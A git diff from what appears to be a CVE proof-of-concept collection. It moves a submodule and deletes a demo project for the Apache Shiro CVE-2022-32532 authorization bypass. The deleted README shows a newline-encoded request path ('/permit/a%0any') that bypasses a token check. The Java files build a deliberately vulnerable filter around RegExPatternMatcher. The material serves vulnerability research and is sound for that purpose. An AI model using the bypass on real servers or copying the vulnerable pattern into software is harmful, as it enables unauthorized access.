diff --git a/.gitmodules b/.gitmodules index 869d5aae..6ee874ba 100644 --- a/.gitmodules +++ b/.gitmodules @@ -5,6 +5,6 @@ [submodule "cve/django/2022/CVE-2022-28346/POC_env"] path = cve/django/2022/CVE-2022-28346/POC_env url = https://github.com/DeEpinGh0st/CVE-2022-28346 -[submodule "CVE-2022-32532"] - path = CVE-2022-32532 +[submodule "cve/apache-Shiro/2022/CVE-2022-32532"] + path = cve/apache-Shiro/2022/CVE-2022-32532 url = https://github.com/Lay0us1/CVE-2022-32532 diff --git a/CVE-2022-32532 b/cve/apache-Shiro/2022/CVE-2022-32532 similarity index 100% rename from CVE-2022-32532 rename to cve/apache-Shiro/2022/CVE-2022-32532 diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore deleted file mode 100644 index 549e00a2..00000000 --- a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore +++ /dev/null @@ -1,33 +0,0 @@ -HELP.md -target/ -!.mvn/wrapper/maven-wrapper.jar -!**/src/main/**/target/ -!**/src/test/**/target/ - -### STS ### -.apt_generated -.classpath -.factorypath -.project -.settings -.springBeans -.sts4-cache - -### IntelliJ IDEA ### -.idea -*.iws -*.iml -*.ipr - -### NetBeans ### -/nbproject/private/ -/nbbuild/ -/dist/ -/nbdist/ -/.nb-gradle/ -build/ -!**/src/main/**/build/ -!**/src/test/**/build/ - -### VS Code ### -.vscode/ diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md deleted file mode 100644 index 975b0366..00000000 --- a/cve/apache-Shiro/2022/CVE-2022-32532/README.md +++ /dev/null @@ -1,35 +0,0 @@ -# CVE-2022-32532 - -## about - -This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532). - -In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability. - -## introduce - -Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit` - -This request can succeed -```http request -GET /permit/any HTTP/1.1 -Token: 4ra1n -``` - -Access is not allowed when there is no token request header -```http request -GET /permit/any HTTP/1.1 -``` - -It can be bypassed in a simple way in special but common configurations -```http request -GET /permit/a%0any HTTP/1.1 -``` - -## reference - -https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh - -This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978) - -Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher) diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml deleted file mode 100644 index 5210b547..00000000 --- a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml +++ /dev/null @@ -1,38 +0,0 @@ - - - 4.0.0 - - org.springframework.boot - spring-boot-starter-parent - 2.7.0 - - - com.example - shiro-demo - 0.0.1-SNAPSHOT - shiro-demo - CVE-2022-32532 - - 1.8 - - - - org.springframework.boot - spring-boot-starter-web - - - org.apache.shiro - shiro-spring - 1.9.0 - - - - - - org.springframework.boot - spring-boot-maven-plugin - - - - diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java deleted file mode 100644 index fd71b1a0..00000000 --- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java +++ /dev/null @@ -1,21 +0,0 @@ -package com.example.shirodemo; - -import org.springframework.web.bind.annotation.PathVariable; -import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.RestController; - -@RestController -public class DemoController { - @RequestMapping(path = "/permit/{value}") - public String permit(@PathVariable String value) { - System.out.println("success!"); - return "success"; - } - - // Another Bypass - // @RequestMapping(path = "/permit/*") - public String permit() { - System.out.println("success!"); - return "success"; - } -} diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java deleted file mode 100644 index beaf98ae..00000000 --- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java +++ /dev/null @@ -1,35 +0,0 @@ -package com.example.shirodemo; - -import org.apache.shiro.util.RegExPatternMatcher; -import org.apache.shiro.web.filter.AccessControlFilter; - -import javax.servlet.ServletRequest; -import javax.servlet.ServletResponse; -import javax.servlet.http.HttpServletRequest; -import java.io.IOException; - -public class MyFilter extends AccessControlFilter { - - public MyFilter(){ - super(); - this.pathMatcher = new RegExPatternMatcher(); - } - - @Override - protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) { - String token = ((HttpServletRequest)request).getHeader("Token"); - // todo: check permission ... - return token != null && token.equals("4ra1n"); - } - - @Override - protected boolean onAccessDenied(ServletRequest request, ServletResponse response) { - System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI()); - try { - response.getWriter().println("access denied"); - } catch (IOException e) { - e.printStackTrace(); - } - return false; - } -} diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java deleted file mode 100644 index d24431e4..00000000 --- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java +++ /dev/null @@ -1,40 +0,0 @@ -package com.example.shirodemo; - -import org.apache.shiro.spring.web.ShiroFilterFactoryBean; -import org.apache.shiro.mgt.SecurityManager; -import org.apache.shiro.util.RegExPatternMatcher; -import org.apache.shiro.web.filter.mgt.*; -import org.apache.shiro.web.mgt.WebSecurityManager; -import org.apache.shiro.web.servlet.AbstractShiroFilter; - - -public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean { - - public MyShiroFilterFactoryBean() { - super(); - } - - @Override - protected AbstractShiroFilter createInstance() { - SecurityManager securityManager = this.getSecurityManager(); - FilterChainManager manager = new DefaultFilterChainManager(); - manager.addFilter("myFilter",new MyFilter()); - // my filter - manager.addToChain("/permit/.*", "myFilter"); - // todo: add other filters - - PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver(); - chainResolver.setFilterChainManager(manager); - // set RegExPatternMatcher - chainResolver.setPathMatcher(new RegExPatternMatcher()); - return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver); - } - - static class SpringShiroFilter extends AbstractShiroFilter { - protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) { - this.setSecurityManager(webSecurityManager); - this.setFilterChainResolver(resolver); - } - } -} - diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java deleted file mode 100644 index 30a0f1b5..00000000 --- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java +++ /dev/null @@ -1,22 +0,0 @@ -package com.example.shirodemo; - -import org.apache.shiro.mgt.SecurityManager; -import org.apache.shiro.web.mgt.DefaultWebSecurityManager; -import org.springframework.context.annotation.Bean; -import org.springframework.context.annotation.Configuration; - -@Configuration -public class ShiroConfig { - - @Bean - public SecurityManager securityManager() { - return new DefaultWebSecurityManager(); - } - - @Bean - public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) { - MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean(); - shiroFilterFactoryBean.setSecurityManager(securityManager); - return shiroFilterFactoryBean; - } -} \ No newline at end of file diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java deleted file mode 100644 index 5d4615bd..00000000 --- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java +++ /dev/null @@ -1,13 +0,0 @@ -package com.example.shirodemo; - -import org.springframework.boot.SpringApplication; -import org.springframework.boot.autoconfigure.SpringBootApplication; - -@SpringBootApplication -public class ShiroDemoApplication { - - public static void main(String[] args) { - SpringApplication.run(ShiroDemoApplication.class, args); - } - -} diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties deleted file mode 100644 index e69de29b..00000000